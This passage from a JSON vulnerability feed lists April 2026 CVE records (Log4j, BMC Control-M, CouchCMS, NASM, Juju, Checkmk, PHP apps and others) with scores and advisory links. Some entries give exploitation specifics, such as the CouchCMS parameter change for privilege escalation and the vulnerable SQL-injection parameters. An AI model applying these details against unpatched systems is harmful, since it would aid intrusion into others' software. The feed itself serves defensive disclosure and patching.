producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records.\n  *  Alternative StAX implementations (e.g.,  Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger.\n\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4077","https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout","https://logging.apache.org/security.html#CVE-2026-34480","http://www.openwall.com/lists/oss-security/2026/04/10/9"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34481","summary":"Apache Log4j's  JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. 
This may cause downstream log processing systems to reject or fail to index affected records.\n\nAn attacker can exploit this issue only if both of the following conditions are met:\n\n  *  The application uses JsonTemplateLayout.\n  *  The application logs a MapMessage containing an attacker-controlled floating-point value.\n\n\nUsers are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00119,"ranking_epss":0.30807,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4080","https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/manual/json-template-layout.html","https://logging.apache.org/security.html#CVE-2026-34481","http://www.openwall.com/lists/oss-security/2026/04/10/10"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34727","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the OIDC callback handler issues a full JWT token without checking whether the matched user has TOTP two-factor authentication enabled. When a local user with TOTP enrolled is matched via the OIDC email fallback mechanism, the second factor is completely skipped. 
This vulnerability is fixed in 2.3.0.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.11187,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg"],"published_time":"2026-04-10T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23781","summary":"An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A set of default debug user credentials is hardcoded in cleartext within the application package. If left unchanged, these credentials can be easily obtained and may allow unauthorized access to the MFT API debug interface.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00022,"ranking_epss":0.05866,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9022/Patches/Control-M-MFT-PAAFP-9-0-22-025/","https://www.bmc.com/support/resources/issue-defect-management.html"],"published_time":"2026-04-10T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29002","summary":"CouchCMS contains a privilege escalation vulnerability that allows authenticated Admin-level users to create SuperAdmin accounts by tampering with the f_k_levels_list parameter in user creation requests. 
Attackers can modify the parameter value from 4 to 10 in the HTTP request body to bypass authorization validation and gain full application control, circumventing restrictions on SuperAdmin account creation and privilege assignment.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":8.6,"epss":0.00034,"ranking_epss":0.09857,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/thepiyushkumarshukla/477e2d2bbbe8cc3ec0d640c50f0cf9e1","https://www.couchcms.com/","https://www.vulncheck.com/advisories/couchcms-privilege-escalation-via-f-k-levels-list-parameter"],"published_time":"2026-04-10T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29043","summary":"HDF5 is software for managing data. In 1.14.1-2 and earlier, an attacker who can control an h5 file parsed by HDF5 can trigger a write-based heap buffer overflow condition in the H5T__ref_mem_setnull method. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflow against modern operating systems.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.12024,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5g5w-2277"],"published_time":"2026-04-10T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34477","summary":"The fix for  CVE-2025-68161 https://logging.apache.org/security.html#CVE-2025-68161  was incomplete: it addressed hostname verification only when enabled via the  log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName  system property, but not when configured through the  verifyHostName 
https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName  attribute of the <Ssl> element.\n\nAlthough the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value.\n\nA network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met:\n\n  *  An SMTP, Socket, or Syslog appender is in use.\n  *  TLS is configured via a nested <Ssl> element.\n  *  The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured.\nThis issue does not affect users of the HTTP appender, which uses a separate  verifyHostname https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAppender-attr-verifyHostName  attribute that was not subject to this bug and verifies host names by default.\n\nUsers are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.00108,"ranking_epss":0.29071,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/logging-log4j2/pull/4075","https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4","https://logging.apache.org/cyclonedx/vdr.xml","https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName","https://logging.apache.org/security.html#CVE-2026-34477"],"published_time":"2026-04-10T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36235","summary":"A SQL injection vulnerability was found in the scheduleSubList.php file of itsourcecode Online Student Enrollment System v1.0. 
The reason for this issue is that the 'subjcode' parameter is directly embedded into the SQL query via string interpolation without any sanitization or validation.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_scheduleSubList.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:25","vendor":"itsourcecode","product":"online_student_enrollment_system","version":null},{"cve_id":"CVE-2026-36236","summary":"SourceCodester Engineers Online Portal v1.0 is vulnerable to SQL Injection in update_password.php via the new_password parameter.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/sourcecodester-Engineers_Online_Portal_in_PHP_update_password.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:25","vendor":"janobe","product":"engineers_online_portal","version":null},{"cve_id":"CVE-2026-36232","summary":"A SQL injection vulnerability was found in the instructorClasses.php file of itsourcecode Online Student Enrollment System v1.0. 
The reason for this issue is that the 'classId' parameter from $_GET['classId'] is directly concatenated into the SQL query without any sanitization or validation.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_instructorClasses.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:24","vendor":"itsourcecode","product":"online_student_enrollment_system","version":null},{"cve_id":"CVE-2026-36233","summary":"A SQL injection vulnerability was found in the assignInstructorSubjects.php file of itsourcecode Online Student Enrollment System v1.0. The reason for this issue is that attackers can inject malicious code via the parameter \"subjcode\" and use it directly in SQL queries without the need for appropriate cleaning or validation.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_assignInstructorSubjects.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:24","vendor":"itsourcecode","product":"online_student_enrollment_system","version":null},{"cve_id":"CVE-2026-36234","summary":"itsourcecode Online Student Enrollment System v1.0 is vulnerable to SQL Injection in newCourse.php via the 'coursename' 
parameter.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Amorsec/CVE-PHP/blob/main/itsourcecode-Online_Student_Enrollment_System_in_newCourse.php_sql_injection.pdf"],"published_time":"2026-04-10T15:16:24","vendor":"itsourcecode","product":"online_student_enrollment_system","version":null},{"cve_id":"CVE-2026-23780","summary":"An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. A SQL injection vulnerability in the MFT API's debug interface allows an authenticated attacker to inject malicious queries due to improper input validation and unsafe dynamic SQL handling. Successful exploitation can enable arbitrary file read/write operations and potentially lead to remote code execution.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12773,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9022/Patches/Control-M-MFT-PAAFP-9-0-22-025/","https://www.bmc.com/support/resources/issue-defect-management.html"],"published_time":"2026-04-10T15:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-23782","summary":"An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. An API management endpoint allows unauthenticated users to obtain both an API identifier and its corresponding secret value. 
With these exposed secrets, an attacker could invoke privileged API operations, potentially leading to unauthorized access.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07788,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9021/Patches/Control-M-Server-PACTV-9-0-21-308/?srid=ab0apVT3","https://www.bmc.com/support/resources/issue-defect-management.html"],"published_time":"2026-04-10T15:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-29861","summary":"PHP-MYSQL-User-Login-System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at login.php.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02372,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/amanyadav78/CVE-2026-29861"],"published_time":"2026-04-10T15:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31262","summary":"Cross Site Scripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 allows a remote attacker to obtain sensitive information and execute arbitrary code via the URL parameter","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00058,"ranking_epss":0.17954,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoXSS/ORtoXSS.txt","https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS"],"published_time":"2026-04-10T15:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-44560","summary":"owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive 
checking.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3","https://github.com/owntone/owntone-server/issues/1873"],"published_time":"2026-04-10T15:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6067","summary":"A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due to a lack of bounds checking in the obj_directive() function. This vulnerability can be exploited by a user assembling a malicious .asm file, potentially leading to heap memory corruption, denial of service (crash), and arbitrary code execution.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00056,"ranking_epss":0.17556,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/netwide-assembler/nasm/issues/203"],"published_time":"2026-04-10T14:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6068","summary":"NASM contains a heap use after free vulnerability in response file (-@) processing where a dangling pointer to freed memory is stored in the global depend_file and later dereferenced, as the response-file buffer is freed before the pointer is used, allowing for data corruption or unexpected behavior.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07701,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/netwide-assembler/nasm/issues/222"],"published_time":"2026-04-10T14:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6069","summary":"NASM’s disasm() function contains a stack based buffer overflow when formatting disassembly output, allowing an attacker triggered out-of-bounds write when `slen` exceeds the buffer 
capacity.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.11987,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/netwide-assembler/nasm/issues/217"],"published_time":"2026-04-10T14:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40217","summary":"LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via bytecode rewriting at the /guardrails/test_custom_code URI.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00188,"ranking_epss":0.40669,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.x41-dsec.de/lab/advisories/x41-2026-001-litellm/"],"published_time":"2026-04-10T14:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33092","summary":"Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02564,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security-advisory.acronis.com/advisories/SEC-9407"],"published_time":"2026-04-10T14:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-58913","summary":"Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion.This issue affects VideoPro: from n/a through 
2.3.8.1.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00115,"ranking_epss":0.30058,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://patchstack.com/database/wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-1-local-file-inclusion-vulnerability?_s_id=cve"],"published_time":"2026-04-10T14:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-58920","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato allows Reflected XSS.This issue affects Cerato: from n/a through 2.2.18.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00033,"ranking_epss":0.09585,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://patchstack.com/database/wordpress/theme/cerato/vulnerability/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"],"published_time":"2026-04-10T14:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-5804","summary":"Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion.This issue affects Case Theme User: from n/a before 1.0.4.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00067,"ranking_epss":0.20721,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://patchstack.com/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-case-theme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=cve"],"published_time":"2026-04-10T14:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5774","summary":"Improper synchronization of the userTokens map in the API server in Canonical Juju 4.0.5, 3.6.20, and 2.9.56 may allow an authenticated user to possibly 
cause a denial of service on the server or possibly reuse a single-use discharge token.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.0,"epss":0.00011,"ranking_epss":0.01398,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/juju/juju/pull/22205","https://github.com/juju/juju/pull/22206","https://github.com/juju/juju/security/advisories/GHSA-7m55-2hr4-pw78","https://github.com/juju/juju/security/advisories/GHSA-7m55-2hr4-pw78"],"published_time":"2026-04-10T13:16:46","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5412","summary":"In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privileged user to access sensitive credentials. This issue is resolved in Juju versions 2.9.57 and 3.6.21.","cvss":9.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.9,"cvss_v4":null,"epss":0.00037,"ranking_epss":0.10882,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/juju/juju/pull/22205","https://github.com/juju/juju/pull/22206","https://github.com/juju/juju/security/advisories/GHSA-w5fq-8965-c969"],"published_time":"2026-04-10T13:16:45","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5777","summary":"This vulnerability exists in the Atom 3x Projector due to improper exposure of the Android Debug Bridge (ADB) service over the local network without authentication or access controls. 
An unauthenticated attacker on the same network can exploit this vulnerability to obtain root-level access, leading to complete compromise of the targeted device.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.00012,"ranking_epss":0.01534,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0179"],"published_time":"2026-04-10T12:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39304","summary":"Denial of Service via Out of Memory vulnerability in Apache ActiveMQ Client, Apache ActiveMQ Broker, Apache ActiveMQ.\n\nActiveMQ NIO SSL transports do not correctly handle TLSv1.3 handshake KeyUpdates triggered by clients. This makes it possible for a client to rapidly trigger updates which causes the broker to exhaust all its memory in the SSL engine leading to DoS.\n\nNote: TLS versions before TLSv1.3 (such as TLSv1.2) are broken but are not vulnerable to OOM. Previous TLS versions require a full handshake renegotiation which causes a connection to hang but not OOM. 
This is fixed as well.\nThis issue affects Apache ActiveMQ Client: before 5.19.4, from 6.0.0 before 6.2.4; Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.4; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.4.\n\nUsers are recommended to upgrade to version 6.2.4 or 5.19.5, which fixes the issue.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.0004,"ranking_epss":0.1194,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://activemq.apache.org/security-advisories.data/CVE-2026-39304-announcement.txt","http://www.openwall.com/lists/oss-security/2026/04/09/17"],"published_time":"2026-04-10T11:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31412","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_mass_storage: Fix potential integer overflow in check_command_size_in_blocks()\n\nThe `check_command_size_in_blocks()` function calculates the data size\nin bytes by left shifting `common->data_size_from_cmnd` by the block\nsize (`common->curlun->blkbits`). However, it does not validate whether\nthis shift operation will cause an integer overflow.\n\nInitially, the block size is set up in `fsg_lun_open()` , and the\n`common->data_size_from_cmnd` is set up in `do_scsi_command()`. During\ninitialization, there is no integer overflow check for the interaction\nbetween two variables.\n\nSo if a malicious USB host sends a SCSI READ or WRITE command\nrequesting a large amount of data (`common->data_size_from_cmnd`), the\nleft shift operation can wrap around. 
This results in a truncated data\nsize, which can bypass boundary checks and potentially lead to memory\ncorruption or out-of-bounds accesses.\n\nFix this by using the check_shl_overflow() macro to safely perform the\nshift and catch any overflows.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.0001,"ranking_epss":0.01121,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5","https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3","https://git.kernel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac","https://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1","https://git.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5d01125cc","https://git.kernel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b"],"published_time":"2026-04-10T11:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4162","summary":"The Gravity SMTP plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.1.4. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to uninstall and deactivate the plugin and delete plugin options. 
NOTE: This vulnerability is also exploitable via a Cross-Site Request Forgery vector.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10384,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.gravityforms.com/brand-new-release-gravity-smtp-2-1-5/","https://www.wordfence.com/threat-intel/vulnerabilities/id/0f9d18a4-262b-4011-91e9-b29a27a76470?source=cve"],"published_time":"2026-04-10T10:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6057","summary":"FalkorDB Browser 1.9.3 contains an unauthenticated path traversal vulnerability in the file upload API that allows remote attackers to write arbitrary files and achieve remote code execution.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00111,"ranking_epss":0.29463,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/FalkorDB/falkordb-browser","https://github.com/FalkorDB/falkordb-browser/pull/1611"],"published_time":"2026-04-10T10:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2021-47961","summary":"A plaintext storage of a password vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access or influence the user's PIN code due to insecure storage. 
This may lead to unauthorized VPN configuration and potential interception of subsequent VPN traffic when combined with user interaction.","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12262,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.synology.com/en-global/security/advisory/Synology_SA_26_05"],"published_time":"2026-04-10T10:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2021-47960","summary":"A files or directories accessible to external parties vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access files within the installation directory via a local HTTP server bound to the loopback interface. By leveraging user interaction with a crafted web page, attackers may retrieve sensitive files such as configuration files, certificates, and logs, leading to information disclosure.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07889,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.synology.com/en-global/security/advisory/Synology_SA_26_05"],"published_time":"2026-04-10T10:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6037","summary":"A vulnerability was determined in code-projects Vehicle Showroom Management System 1.0. This affects an unknown function of the file /util/AddVehicleFunction.php. This manipulation of the argument BRANCH_ID causes sql injection. The attack is possible to be carried out remotely. 
The exploit has been publicly disclosed and may be utilized.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/TAnNbR/CVE/issues/4","https://vuldb.com/submit/796232","https://vuldb.com/vuln/356618","https://vuldb.com/vuln/356618/cti"],"published_time":"2026-04-10T09:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6038","summary":"A vulnerability was identified in code-projects Vehicle Showroom Management System 1.0. This impacts an unknown function of the file /util/RegisterCustomerFunction.php. Such manipulation of the argument BRANCH_ID leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/mrpgi/cve/issues/3","https://vuldb.com/submit/796281","https://vuldb.com/vuln/356619","https://vuldb.com/vuln/356619/cti"],"published_time":"2026-04-10T09:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6042","summary":"A security flaw has been discovered in musl libc up to 1.2.6. Affected is the function iconv of the file src/locale/iconv.c of the component GB18030 4-byte Decoder. Performing a manipulation results in inefficient algorithmic complexity. The attack must be initiated from a local position. 
To fix this issue, it is recommended to deploy a patch.","cvss":4.8,"cvss_version":4.0,"cvss_v2":1.7,"cvss_v3":3.3,"cvss_v4":4.8,"epss":0.00013,"ranking_epss":0.02047,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://vuldb.com/submit/796352","https://vuldb.com/vuln/356620","https://vuldb.com/vuln/356620/cti","https://www.openwall.com/lists/oss-security/2026/04/02/10","https://www.openwall.com/lists/oss-security/2026/04/03/2","http://www.openwall.com/lists/oss-security/2026/04/09/19"],"published_time":"2026-04-10T09:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33456","summary":"Livestatus injection in the notification test mode in Checkmk <2.5.0b4 and <2.4.0p26 allows an authenticated user with access to the notification test page to inject arbitrary Livestatus commands via a crafted service description.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":0.00039,"ranking_epss":0.11461,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://checkmk.com/werk/17989"],"published_time":"2026-04-10T09:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33457","summary":"Livestatus injection in the prediction graph page in Checkmk <2.5.0b4, <2.4.0p26, and <2.3.0p47 allows an authenticated user to inject arbitrary Livestatus commands via a crafted service name parameter due to insufficient sanitization of the service description value.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00042,"ranking_epss":0.12568,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://checkmk.com/werk/17990"],"published_time":"2026-04-10T09:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6036","summary":"A vulnerability was found in code-projects Vehicle Showroom Management System 1.0. 
